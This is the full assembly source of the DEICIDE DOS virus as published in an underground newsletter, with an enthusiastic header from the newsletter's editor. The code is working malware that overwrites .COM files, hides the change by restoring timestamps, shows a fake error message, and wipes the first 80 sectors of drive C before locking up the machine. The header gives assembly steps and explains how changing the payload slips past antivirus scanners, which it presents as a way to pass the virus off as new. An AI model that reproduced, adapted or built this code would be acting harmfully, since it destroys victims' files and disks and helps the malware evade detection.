;*************************************************************************** ; Source code of the DEICIDE Virus, original author: Glen Benton ; Assemble with A86 - Sanitized, English-ized and spruced up for inclusion ; in Crypt Newsletter #7. The Crypt reader will also notice the ; DEICIDE listing has NO declarative red tape - no org's, no assume ; cs,ds,es stuff, no start/ends pairs or proc labels. For the average ; reader, this means TASM and MASM will choke if you try to get them to ; assemble this as is. A86 doesn't need it, as Isaacson is fond of saying, ; and this listing can be assembled directly to a .COMfile ; without the need of a linker. ; ; DEICIDE virus is a kamikaze overwriting .COM infector, with a length ; of 666 bytes in its original state. With A86, you get 665 bytes, which, we ; assume ruins, the 'aesthetics' of things just a bit. (Try adding a NOP ; to the listing if this bugs you too much.) Anyway, on call DEICIDE ; jumps right to the root directory where it looks for a any .COM file ; except COMMAND.COM to infect. ; ; If all files are infected, and DEICIDE is not on the C drive it attempts to ; ruin it anyway. If all files in the root on C are infected, the fixed disk ; is destroyed, a message displayed and the computer hung. ; If a program is successfully overwritten, DEICIDE exits to DOS ; after displaying 'File corruption error.' If DEICIDE is trapped on ; a diskette that is write-protected, it will generate noxious 'Abort, ; Retry, Ignore, Fail' messages. ; ; You can work with DEICIDE quite easily by commenting out the destructive ; sequence and reassembling. Then it will merely mess up .COM's in ; your root directory. If you forget that you're using NDOS or 4DOS, DEICIDE ; will promptly foul your command processor and the operating system ; won't load properly when you reboot. In an interesting side note, ; removing the destructive payload of DEICIDE causes SCAN to lose sight of ; DEICIDE. (There's a simple poor man's method to a 'new' strain. Fool ; your friends who think you've written a virus from scratch.) ; The DEBUG script of DEICIDE has the destructive payload "rearranged" and ; is not, strictly speaking, identical to this listing. This has made ; that copy of DEICIDE (referred to in the scriptfile as DEICIDE2) ; functionally similar to the original, but ; still invisible to SCAN v85b and a number of other commercial products. ; The lesson to be learned here is that software developers shouldn't choose ; generic disk overwriting payloads as signatures for their scanners. ; ; I must confess I'm fascinated by the mind that went into creating DEICIDE. ; Even in 1990, the DEICIDE was more of a 'hard disk bomb' than a virus. ; Think a moment. How many files are in your root directory? How long before ; this sucker activated and spoiled your afternoon? Once? Twice? In ; any case, it still is an easily understood piece of code, enjoying its ; own unique charm. Enjoy looking at DEICIDE. Your virus pal, URNST KOUCH. ;*************************************************************************** Start_Prog: jmp short Start_Virus nop Message db 0Dh,0Ah,'DEICIDE!' db 0Dh,0Ah db 0Dh,0Ah,'Glenn (666) says : BYE BYE HARDDISK!!' db 0Dh,0Ah db 0Dh,0Ah,'Next time be carufull with illegal stuff......$' Start_Virus: mov ah,19h ; Get actual drive int 21h db 0A2h ; Mov [EA],al dw offset Infect_Drive db 0A2h ; A86 assembles this differently dw offset Actual_Drive ; so put the original code here mov ah,47h ; Get actual directory mov dl,0 mov si,offset Actual_Dir int 21h mov ah,1Ah ; stash DTA in safe place mov dx,offset New_DTA int 21h Infect_Next: mov ah,3Bh ; DOS chdir function, go to root dir mov dx,offset Root_Dir int 21h mov ah,4Eh ; Search first .COM file mov cx,0 mov dx,offset Search_Path ; using file mask int 21h Check_Command: mov al,'D' ; Check if 7th char is a 'D' (To prevent cmp [New_DTA+24h],al ; infecting COMMAND.COM, causing jnz Check_Infect ; noticeable boot failure) jmp short Search_Next nop Check_Infect: mov ah,3Dh ; Open found file with write access mov al,2 mov dx,offset New_DTA+1Eh int 21h mov File_Handle,ax ; Save handle mov bx,ax mov ah,57h ; Get date/time of file mov al,0 ; why, for Heaven's sake? int 21h mov File_Date,dx mov File_Time,cx call Go_Beg_File ; Go to beginning of file mov ah,3Fh ; Read first 2 bytes mov cx,2 mov dx,offset Read_Buf ; into a comparison buffer int 21h mov al,byte ptr [Read_Buf+1] ; now, take a look at the cmp al,offset Start_Virus-102h ; buffer and the start of jnz Infect ; DEICIDE. Is it the ; jump? If not, infect file mov ah,3Eh ; Already infected, so close file int 21h Search_Next: mov ah,4Fh ; Search next file function int 21h jnc Check_Command ; No error - try this file mov al,Infect_Drive ; Skip to next drive, cmp al,0 jnz No_A_Drive inc al No_A_Drive: inc al cmp al,3 ; Is the drive C:? jnz No_Destroy ; ; if it is and haven't been ; able to infect mov al,2 ; Overwrite first 80 sectors, mov bx,0 ; BUMMER! mov cx,50h ; BUMMER! mov dx,0 ; BUMMER! int 26h ; BUMMER! mov ah,9 ; Show silly message mov dx,offset Message int 21h Lock_System: jmp short Lock_System ; lock up the system so the poor fool ; has to start reloading right away No_Destroy: mov dl,al ; New actual drive mov ah,0Eh mov Infect_Drive,dl ; Save drive number. int 21h jmp Infect_Next Infect: call Go_Beg_File ;call seek routine mov ah,40h ; Write DEICIDE to the file mov cx,offset End_Virus-100h ;right over the top, starting mov dx,100h ; at the beginning, thus messing int 21h ; up everything mov ah,57h ; Restore date/time of file mov al,1 ; why, for God's sake? You mov cx,File_Time ; think no one will notice mov dx,File_Date ; file is destroyed? int 21h mov ah,3Eh ; Close file, let's be neat int 21h mov dl,byte ptr [Actual_Drive] ; Back to original drive mov ah,0Eh int 21h mov ah,3Bh ; And original dir mov dx,offset Actual_Dir int 21h mov ah,9 ; Show 'File corruption error.' mov dx,offset Quit_Message ; when destroyed, infected int 21h ; program misfires and DEICIDE ; executes so user may be placated int 20h ; Exit back to DOS Go_Beg_File: mov ah,42h ; Procedure: seek to start of file mov al,0 mov cx,0 mov dx,0 int 21h ret File_Date dw (?) File_Time dw (?) File_Handle dw (?) Infect_Drive db (?) Root_Dir db '\',0 Search_Path db '*.COM',0 Read_Buf db 2 dup (?) Actual_Drive db (?) Quit_Message db 'File corruption error.',0Dh,0Ah,'$' New_DTA db 2Bh dup (?) Actual_Dir db 40h dup (?) db 'This experimental virus was written by Glenn Benton to ' db 'see if I can make a virus while learning machinecode for ' db '2,5 months. (C) 10-23-1990 by Glenn. I keep on going ' db 'making virusses.' End_Virus: